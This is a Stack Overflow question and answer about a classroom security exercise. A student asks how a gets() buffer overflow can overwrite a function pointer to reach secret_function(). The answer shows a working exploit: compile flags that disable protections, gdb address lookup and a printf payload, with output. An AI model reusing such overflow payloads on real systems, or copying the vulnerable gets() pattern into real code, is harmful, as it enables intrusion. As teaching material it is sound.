4

I am currently trying to make a code more safe for a cybersecurity exercise. I was asked to make the flag contained in the secret_function() come out. The problem is that I can't modify the code and that I don't see how I can give the address of the secret_function() as the value of the function_ptr(). The only hint we were given is that a buffer_overflow might help, even though I don't understand how.

I tried multiple values, but the only thing I was able to achieve was a segfault when I exceeded 10 characters due to the buffer limit. Here is the code of the functions involved:

void secret_function ()
{
    printf ("{The stone isn't in the pocket anymore ...}\n");
}
void monitor_radiation_levels ()
{
    char buffer[10];
    void (* function_ptr) () = NULL;
    printf ("Enter radiation levels: ");
    gets (buffer);
    printf ("Radiation Levels: %s\n" ,buffer);
    if (function_ptr){
        function_ptr();
    } else {
        printf ("Function Pointer: %p\n",( void * ) function_ptr);
    }
}
Improve this question
6
  • 1
    Check the addresses of buffer and function_ptr for starters. Maybe you can't do it this way because they are laid out in memory not as you are expecting. Commented May 5 at 15:33
  • Thank you for the tip i'll look into it right now. Commented May 5 at 15:35
  • How often do you expect to be hacking into programs where 1) the programmer sent you the full C source, 2) they also forgot the optimizer when building and 3) the ABI and compiler's stack layout places the function pointer after the misaligned buffer of 10 bytes rather than before it, 4) the function pointer is stored on the stack and not a register and 5) there's no ASLR? Commented May 6 at 6:42
  • @Lundin The first part of this exercise was done through manual fuzzing so I didn't have access to the c code but just to the shell made from alot of functions like this one. Now we are supposed to find more vulnerabilities since we got the c code. Commented May 6 at 9:16
  • @Tempest_Sword My point is that this is a 100% artificial exercise, from which very little of use can be learnt. You may pick up lots of misconceptions from it though, such that the misconception that variables are allocated on the stack as per the order they appear in the C code, or the misconception that all variables are declared on the stack and not in registers, or the misconception that all computers have stacks that grow in the same direction. Commented May 6 at 9:34

1 Answer 1

Reset to default
6

To demonstrate the overflow, I use Linux and gcc 15.1.1.

I created this source file:

#include <stdio.h>

void secret_function ()
{
    printf ("{The stone isn't in the pocket anymore ...}\n");
}
void monitor_radiation_levels ()
{
    char buffer[10];
    void (* function_ptr) () = NULL;
    printf ("Enter radiation levels: ");
    gets (buffer);
    printf ("Radiation Levels: %s\n" ,buffer);
    if (function_ptr){
        function_ptr();
    } else {
        printf ("Function Pointer: %p\n",( void * ) function_ptr);
    }
}

int main() {
    monitor_radiation_levels();
}

Then compiled it with gcc -std=c99 -fno-stack-protector -static main.c

C99 standard is selected to allow using deprecated gets function. We need to disable stack overflow protector to exploit stack buffer overflow. We build the program statically to disable Address Space Layout Randomization.

Use the debugger to get the secret function address: gdb ./a.out


(gdb) p &secret_function
$1 = (<text variable, no debug info> *) 0x402f05 <secret_function>

Now exploit the buffer overflow:

$ printf 'AAAAAAAAAA\x05\x2f\x40' | ./a.out
Enter radiation levels: Radiation Levels: AAAAAAAAAA/@
{The stone isn't in the pocket anymore ...}

Note that without disabling the stack protector, we get this result:

$ printf 'AAAAAAAAAA\x05\x2f\x40' | ./a.out
Enter radiation levels: Radiation Levels: AAAAAAAAAA/@
Function Pointer: (nil)
*** stack smashing detected ***: terminated
Aborted (core dumped)
Improve this answer
Sign up to request clarification or add additional context in comments.

4 Comments

Since the program is built from scratch why not simply change the code and initialize function_ptr to secret_function?
I am not supposed to modify the code @Lundin.
Thank you @tla it worked flawlessly and the answer was clear. Any website you would recommend to learn more about these methods?
I played some wargames like SmashTheStack, pwnable.kr, io.netgarage.org back in the day. The Shellcoder's Handbook is a good read, but overall all the guides get outdated with time, e.g. stack protector being enabled by default is a somewhat recent addition. Playing maintained wargames that are known to be solvable and hanging out in IRC where you can ask questions about provided binaries is probably the best option if you want to learn. Also if you want to learn about memory layout and stuff like GOT/PLT, "Computer Systems: A Programmer's Perspective" is a great book.

Your Answer

By clicking “Post Your Answer”, you agree to our terms of service and acknowledge you have read our privacy policy.

Start asking to get answers

Find the answer to your question by asking.

Ask question

Explore related questions

See similar questions with these tags.